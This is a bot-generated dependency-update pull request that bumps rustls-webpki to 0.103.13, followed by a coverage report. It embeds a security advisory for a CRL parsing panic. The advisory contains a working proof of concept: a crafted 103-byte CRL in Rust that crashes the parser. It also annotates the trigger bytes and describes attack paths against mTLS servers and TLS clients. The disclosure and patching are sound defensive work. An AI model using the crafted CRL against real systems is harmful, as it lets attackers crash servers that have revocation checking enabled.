chore(deps): update rust crate rustls-webpki to v0.103.13 [security]

[renovate]

This PR contains the following updates:

Package	Type	Update	Change
rustls-webpki	dependencies	patch	0.103.12 → 0.103.13

---

rustls-webpki: Denial of service via panic on malformed CRL BIT STRING

GHSA-82j2-j2ch-gfr8

More information

Details

Summary

bit_string_flags() in src/der.rs panics with an index-out-of-bounds when given a BIT STRING whose content is exactly [0x00] (one byte: zero padding bits, zero data bytes). This is reachable through the public API BorrowedCertRevocationList::from_der() via the issuingDistributionPoint CRL extension.

Precondition: CRL checking is opt-in in rustls-webpki. This vulnerability affects only applications that explicitly pass RevocationOptions to verify_for_usage() and load CRL bytes from a source the attacker can influence. The default rustls configuration (no RevocationOptions) is not affected.

AI disclosure: This report was prepared with AI assistance (Claude). The vulnerability was discovered by differential fuzzing against a formally-verified Rust oracle. All technical claims have been independently verified against the live source code before submission.

Details

bit_string_flags() in src/der.rs reads the content of named-bit BIT
STRINGs (KeyUsage, ReasonFlags, etc.). Its input guard:

if padding_bits > 7 || (raw_bits.is_empty() && padding_bits != 0) {
    return Err(Error::BadDer);
}
let last_byte = raw_bits[raw_bits.len() - 1];  // ← crash

misses the case padding_bits == 0 && raw_bits.is_empty().
When a BIT STRING has content [0x00] (one padding-bits byte set to zero, no data bytes):

• padding_bits = 0x00 — passes the > 7 check ✓
• raw_bits = [] — passes is_empty() && != 0 check ✓ (because 0 != 0 is false)
• raw_bits.len() - 1 = 0usize - 1 = underflow → usize::MAX
• raw_bits[usize::MAX] → panic

Debug: thread 'main' panicked: attempt to subtract with overflow
Release: thread 'main' panicked: index out of bounds: the len is 0
but the index is 18446744073709551615

PoC

Cargo.toml:

[dependencies]
rustls-webpki = "0.102.8"   # also reproduces on 0.103.12

src/main.rs:

fn main() {
    let crl: &[u8] = &[
        0x30, 0x65, 0x30, 0x50, 0x02, 0x01, 0x01, 0x30, 0x0d, 0x06, 0x09,
        0x2a, 0x86, 0x48, 0x86, 0xf7, 0x0d, 0x01, 0x01, 0x0b, 0x05, 0x00,
        0x30, 0x0c, 0x31, 0x0a, 0x30, 0x08, 0x06, 0x03, 0x55, 0x04, 0x03,
        0x13, 0x01, 0x41, 0x17, 0x0d, 0x32, 0x30, 0x30, 0x31, 0x30, 0x31,
        0x30, 0x30, 0x30, 0x30, 0x30, 0x30, 0x5a, 0x17, 0x0d, 0x32, 0x31,
        0x30, 0x31, 0x30, 0x31, 0x30, 0x30, 0x30, 0x30, 0x30, 0x30, 0x5a,
        0xa0, 0x10, 0x30, 0x0e, 0x30, 0x0c, 0x06, 0x03, 0x55, 0x1d, 0x1c,
        0x04, 0x05, 0x30, 0x03, 0x83, 0x01, 0x00, 0x30, 0x0d, 0x06, 0x09,
        0x2a, 0x86, 0x48, 0x86, 0xf7, 0x0d, 0x01, 0x01, 0x0b, 0x05, 0x00,
        0x03, 0x02, 0x00, 0x00,
    ];
    // Panics — never returns
    let _ = webpki::BorrowedCertRevocationList::from_der(crl);
}

output:

thread 'main' panicked at src/der.rs:...
index out of bounds: the len is 0 but the index is 18446744073709551615

Trigger

a0 10            -- cRLExtensions [0] EXPLICIT
  30 0e          -- SEQUENCE OF Extension
    30 0c        -- Extension SEQUENCE
      06 03 55 1d 1c   -- OID 2.5.29.28 (id-ce-issuingDistributionPoint)
      04 05            -- OCTET STRING (extnValue)
        30 03          -- IssuingDistributionPoint SEQUENCE
          83 01 00     -- [3] onlySomeReasons: BIT STRING, len=1, content=0x00
                       --   padding_bits=0, data=[]  ← TRIGGER

Impact

• Who is affected:
  Applications that (1) use rustls-webpki with CRL
  revocation checking explicitly enabled via RevocationOptions, and (2)
  load CRL bytes from a source an attacker can influence.
• Attack paths:
  • mTLS server (most realistic): An attacker obtains any certificate from a CA that permits custom CDP URLs — common in enterprise PKI. They set the CDP to a server they control, serve the 103-byte crafted CRL, and connect to the target. The server fetches the attacker's CRL during the handshake and panics. No MITM required.
  • TLS client with server-cert CRL checking: An attacker who can MITM an HTTP CRL distribution point (ARP/DNS poisoning on a local network) serves the crafted CRL in place of the legitimate one.

Severity

• CVSS Score: 7.5 / 10 (High)
• Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

References

• https://github.com/rustls/webpki/security/advisories/GHSA-82j2-j2ch-gfr8
• https://rustsec.org/advisories/RUSTSEC-2026-0104.html
• https://github.com/advisories/GHSA-82j2-j2ch-gfr8

This data is provided by the GitHub Advisory Database (CC-BY 4.0).

---

Configuration

📅 Schedule: (UTC)

• Branch creation
  • ""
• Automerge
  • At any time (no schedule defined)

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

♻ Rebasing: Whenever PR is behind base branch, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

---

• If you want to rebase/retry this PR, check this box

---

This PR was generated by Mend Renovate. View the repository job log.

[codecov]

Codecov Report

✅ All modified and coverable lines are covered by tests.
✅ Project coverage is 80.44%. Comparing base (88b4b9c) to head (979b664).
⚠️ Report is 2 commits behind head on main.

Additional details and impacted files

@@            Coverage Diff             @@
##             main    #1684      +/-   ##
==========================================
+ Coverage   75.53%   80.44%   +4.91%     
==========================================
  Files         170      127      -43     
  Lines       20900    16413    -4487     
==========================================
- Hits        15786    13204    -2582     
+ Misses       4902     3209    -1693     
+ Partials      212        0     -212     

Flag	Coverage Δ
go-tests	?
rust-tests	80.44% <ø> (ø)

Flags with carried forward coverage won't be shown. Click here to find out more.

☔ View full report in Codecov by Sentry.
📢 Have feedback on the report? Share it here.

🚀 New features to boost your workflow:

• ❄️ Test Analytics: Detect flaky tests, report on failures, and find test suite problems.